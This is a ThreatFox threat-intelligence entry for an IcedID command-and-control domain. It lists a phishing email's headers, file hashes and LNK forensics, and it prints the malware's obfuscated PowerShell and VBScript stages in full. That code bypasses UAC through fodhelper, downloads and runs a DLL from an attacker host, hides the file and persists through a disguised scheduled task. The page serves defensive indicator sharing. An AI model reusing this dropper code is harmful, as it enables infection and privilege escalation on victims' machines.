ThreatFox IOC Database
You are viewing the ThreatFox database entry for domain ilekvoyn.com.
Database Entry
This IOC expired
This IOC is an old IOC and hence has expired on 2025-12-26 01:15:01 UTC. We therefore refrain from exporting it into our datasets. As a result, this database entry is purely informational and has no impact.
| IOC ID: | 628465 |
|---|---|
| IOC: | ilekvoyn.com |
| IOC Type : | domain |
| Threat Type : | botnet_cc |
| Malware: | IcedID |
| Malware alias: | BokBot, IceID |
| Confidence Level : | Confidence level is high (100%) |
| First seen: | 2022-05-23 16:36:12 UTC |
| Last seen: | 2023-09-29 09:38:30 UTC |
| UUID: | 755d79f8-dab6-11ec-ae87-42010aa4000a |
| Reporter |  AndreGironda |
| Reward | 5 credits from ThreatFox |
| Tags: | bokbot IcedID |
| Reference: | https://tria.ge/220523-tqthmsefd4 |
AndreGironda
MITRE T1566.001Date: Mon, 23 May 2022 14:30-15:00 +0000
Received: from pv55.mxout.mta2.net (178.33.242.55)
From: Accountant General <accountant@samco.in>
Subject: Invoice #0000467
Message-Id: <4ugwtpswvg8i.jofj-vaxRc1lGyAU3FQsqg2@tracking.samco.in>
Reply-To: Accountant General <accountant@samco.in>
Sender: Accountant General <accountant@samco.in>
X-Msg-EID: jofj-vaxRc1lGyAU3FQsqg2
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="=-eZCfDm3T9GjaJt+saZgjTjDg51dE5O00y3WKyw=="
Return-Path: bounces+jofj-vaxRc1lGyAU3FQsqg2@postman.samco.in
Attachment Name: Invoice.zip
Zipfile SHA256: 1875f24165d7566034ec526791cfdadf914944c253c209309e8bb9aeb0348cce
Unzipped LNK Name: Invoice.lnk
LNK SHA256: afa9e0d6f862042f965ae97493df90d46daeb96df9324748450e653ee5d41f67
LNK Forensics --
"target_full_path","target_modification_time","target_access_time","target_creation_time","target_size","target_hostname"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","2018-02-02T18:20:52Z","2018-02-02T18:20:55Z","2018-02-02T18:20:52Z","431616","win-o0lec37vl9i"
LNK Obfuscated Execution --
<#t^ Jm&U'@LFD#>$GbPGyMRdDAirQUbvqjQAx=@(11809,11815,11804,11816,11797,11732,11804,11816,11816,11812,11815,11758,11747,11747,11799,11811,11810,11800,11801,11814,11797,11800,11805,11811,11746,11816,11818,11747,11748,11757,11756,11755,11750,11753,11755,11752,11746,11804,11816,11797);<#t^ Jm&U'@LFD#>$BBoVmbBDLYdvTJUdVS=@(11773,11769,11788);<#t^ Jm&U'@LFD#>function cdeKZpFQIyiV($oPKtzKWXzxtzS){$PVgdIPltaOUo=11700;<#t^ Jm&U'@LFD#>$sRAmdtGLph=$Null;foreach($psxWAlYvqot in $oPKtzKWXzxtzS){$sRAmdtGLph+=[char]($psxWAlYvqot-$PVgdIPltaOUo)};return $sRAmdtGLph};sal OSUDVsWazGlXlQmLc (cdeKZpFQIyiV $BBoVmbBDLYdvTJUdVS);<#t^ Jm&U'@LFD#>OSUDVsWazGlXlQmLc((cdeKZpFQIyiV $GbPGyMRdDAirQUbvqjQAx))
LNK Deobfuscated Execution --
mshta (Stage 1 Below)
Stage 1 URL: hXXps://conderadio[.]tv/09872574.hta
HTA SHA256: ce97847dceb27aabbc144256fcf65868e78e829935e7320dcd67ec949908dff8
VBScript Execution --
Start-Sleep -s 10; function ddnEW(){$aeTpD = $env:Temp + '\' + 'ZDqcC.bat';'if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" % * && exit'| Out-File -FilePath $aeTpD -Encoding Ascii;'@ECHO OFF' | Out-File -FilePath $aeTpD -Encoding Ascii -Append;'powershell.exe -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0' | Out-File -FilePath $aeTpD -Encoding Ascii -Append;'start /b "" cmd /c del "%~f0" && exit' | Out-File -FilePath $aeTpD -Encoding Ascii -Append;'exit' | Out-File -FilePath $aeTpD -Encoding Ascii -Append;New-Item 'HKCU:\Software\Classes\ms-settings\Shell\Open\command' -Value "$aeTpD" -Force;New-ItemProperty -Path 'HKCU:\Software\Classes\ms-settings\Shell\Open\command' -Name 'DelegateExecute' -Value '' -Force;Start-Process 'C:\Windows\System32\fodhelper.exe';sleep(1);Remove-Item 'HKCU:\Software\Classes\ms-settings\' -Recurse -Force}ddnEW ; function tsabfjPqssS($unOzwS, $OvavotsBuGR){[IO.File]::WriteAllBytes($unOzwS, $OvavotsBuGR)};function DwmqrcY($nQwJVlHaFmFtlaGcXC){Start-Sleep -s 10; $tFRNOMsGELdJNI = $jiWbjAiBykCyNJaDU + 'kywdT.bat';'if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" % * && exit'| Out-File -FilePath $tFRNOMsGELdJNI -Encoding Ascii;'@ECHO OFF' | Out-File -FilePath $tFRNOMsGELdJNI -Encoding Ascii -Append;'powershell.exe function tXIPlkvsktLPL ($hyUQNAjDGWycUo){ $mXzmkJZcEjqHY = ''Core update check''; $MAVXCzBKIjuPJeFnAJ = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ''' + " $nQwJVlHaFmFtlaGcXC" + ',' + 'DllRegisterServer' + '''); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $mXzmkJZcEjqHY; Description = ''Core updating process.''; TaskPath = ''UpdateCheck''; RunLevel = ''Highest''}; Register-ScheduledTask @MAVXCzBKIjuPJeFnAJ -Force}; tXIPlkvsktLPL ' + " $nQwJVlHaFmFtlaGcXC" | Out-File -FilePath $tFRNOMsGELdJNI -Append -Encoding Ascii;'start /b "" cmd /c del "%~f0" && exit' | Out-File -FilePath $tFRNOMsGELdJNI -Encoding Ascii -Append;'exit' | Out-File -FilePath $tFRNOMsGELdJNI -Encoding Ascii -Append;New-Item 'HKCU:\Software\Classes\ms-settings\Shell\Open\command' -Value "$tFRNOMsGELdJNI" -Force;$HEHIUOtOjm = '\Shell\Open\command';New-ItemProperty -Path ('HKCU:\Software\Classes\ms-settings' + $HEHIUOtOjm) -Name 'DelegateExecute' -Value '' -Force;Start-Process (bgzoPpjspLRP @(49559,49550,49584,49579,49597,49602,49592,49603,49611,49607,49584,49575,49613,49607,49608,49593,49601,49543,49542,49584,49594,49603,49592,49596,49593,49600,49604,49593,49606,49538,49593,49612,49593));sleep(1);Remove-Item 'HKCU:\Software\Classes\ms-settings\' -Recurse -Force}function iOAOUBsNKOQTL($tsabfjPqssS){$ABsORayAFtO=(bgzoPpjspLRP @(49564,49597,49592,49592,49593,49602));$apjjQmaupU=(Get-ChildItem $tsabfjPqssS -Force);$apjjQmaupU.Attributes=$apjjQmaupU.Attributes -bor ([IO.FileAttributes]$ABsORayAFtO).value__};function ODhMgbboFzialcxnwG($bCKqYPTZfkLwDhkesO){$VkFPPoSbyZDmswv = New-Object (bgzoPpjspLRP @(49570,49593,49608,49538,49579,49593,49590,49559,49600,49597,49593,49602,49608));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OvavotsBuGR = $VkFPPoSbyZDmswv.DownloadData($bCKqYPTZfkLwDhkesO);return $OvavotsBuGR};function bgzoPpjspLRP($ijOFXfSsGv){$qcJvBqHjjRMAM=49492;$mWXwQuWtsP=$Null;foreach($AVxVYUjDry in $ijOFXfSsGv){$mWXwQuWtsP+=[char]($AVxVYUjDry-$qcJvBqHjjRMAM)};return $mWXwQuWtsP};function TYLJgxivDIf(){$jiWbjAiBykCyNJaDU = $env:Temp + '\';$UVpqEEPwIlO = $jiWbjAiBykCyNJaDU + '1.dll'; if (Test-Path -Path $UVpqEEPwIlO){DwmqrcY $UVpqEEPwIlO;}Else{ $ZoJBsS = ODhMgbboFzialcxnwG (bgzoPpjspLRP @(49596,49608,49608,49604,49607,49550,49539,49539,49591,49603,49602,49592,49593,49606,49589,49592,49597,49603,49538,49608,49610,49539,49541,49538,49592,49600,49600));tsabfjPqssS $UVpqEEPwIlO $ZoJBsS;DwmqrcY $UVpqEEPwIlO;};iOAOUBsNKOQTL $UVpqEEPwIlO;;;;;}TYLJgxivDIf;
Stage 2 URL: hXXps://conderadio[.]tv/1.dll
IcedID Stage DLL SHA256: 3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
Malware Samples
The table below documents recent malware samples observed that are associated with this indicator of compromise (IOC).
| Time stamp (UTC) | SHA256 hash | Bazaar |
|---|---|---|
| 2022-05-24 02:21:51 | 0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7 |